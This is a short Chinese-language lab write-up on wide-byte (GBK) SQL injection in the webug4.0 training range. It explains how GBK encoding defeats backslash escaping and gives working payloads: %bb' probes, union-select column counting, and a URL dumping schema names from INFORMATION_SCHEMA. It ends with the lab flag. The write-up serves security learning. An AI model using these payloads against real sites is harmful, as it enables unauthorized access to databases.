webug4.0-宽字节注入

0x01 相关知识

1. 宽字节是什么？

宽字节字符集：一般指Unicode编码的字符集

2. 宽字节注入的作用是什么？

可以绕过转义，也是绕过转义的其中一个办法

3. 宽字节注入产生的原因是什么？

MySQL连接时错误配置为：set character_set_client=gbk

本例错误配置PHP代码：$dbConnectWidth->query("SET names 'gbk'");

4.宽字节注入原理是什么？

当GPC开启(php.ini

　　magic_quotes_gpc = On)或使用addslashes函数过滤提交的参数时，测试注入点使用的单引号 ' 就会被转义为: \'

　　这个的作用就是对敏感函数的转义，让我们无法注入。

如果存在宽字节注入，我们输入%df%27时首先经过上面提到的转义就会变成%df%5c%27(%5c就是反斜杠)。之后再数据库查询由于使用了GBK多字节编码，即在汉字编码范围内两个字节会被编码为一个汉字，然后MySQL服务器会对查询语句进行了GBK编码%df%5c转换成汉字，而单引号逃出了，这个时候就可以注入了。%df不是固定的，可以自己组合。只要是汉字就可以。

参考链接：https://www.heibai.org/post/740.html

0x02 漏洞利用

1.上来看见这个

我们好像意识到了什么，好像有人在侮辱你。。。

2.常规注入手法：

1'	页面没报错 刷新
1 and 1=1 %23	页面没报错 刷新
1 and 1=2 %23	页面没报错 刷新
1' and 1=1 %23	页面没报错 刷新
1' and 1=2 %23	页面没报错 刷新
1%bb'	页面报错

3.页面既然已经报错 ok单引号逃出，那么就好办了 如同显错注入一般 首先判断列数：

输入	输出
3%bb' union select 1 %23	页面报错
3%bb' union select 1,2 %23	页面不报错

 ok 判断出来列数为2

4.获取所有数据库的名称：

192.168.72.136/control/sqlinject/width_byte_injection.php?id=3%bb' union select 1,group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA %23

5.ok 剩下的步骤其实和显错注入一样

请看这篇文章。

6.最后放出flag：

dfsadfsadfas

0x03 结语

                                                                               这个也很简单，没啥可说的